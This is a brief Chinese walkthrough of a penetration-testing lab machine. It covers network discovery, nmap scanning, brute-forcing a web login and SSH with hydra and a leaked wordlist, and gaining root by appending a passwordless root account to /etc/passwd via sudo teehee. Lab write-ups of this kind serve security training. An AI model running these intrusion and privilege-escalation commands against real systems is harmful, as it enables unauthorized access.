目录
靶场搭建
靶场下载地址
信息收集
netdiscover -r 192.168.226.0/24
发现目标对象 为 :192.168.226.141
nmap -sS -sV -A -T4 -p- 192.168.226.141
使用nmap查看目标 开启了那些端口与服务
指纹信息收集
网络目录收集
漏洞利用
在指纹信息中 没有可利用的已知漏洞 但有登入框 直接穷举
发现在其中回显不一样
手动输入发现密码为 :happy
发现执行系统命令
ls -l
查看系统用户 jim sam charles
在www-data权限下无法上传写入木马文件,在jim目录下发现其存在字典文件
将泄露的字典文件写入本地,爆破ssh
hydra -l jim -P ./pass.txt -t 30 -f 192.168.226.141 ssh
获取jim的shell
收集更多信息 发现 存在邮件
查看有权限命令进行提权,发现teehee 可以追加文件内容并不覆盖
可以通过追加用户提权
echo "test::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd
Flag1
在root目录下找到flag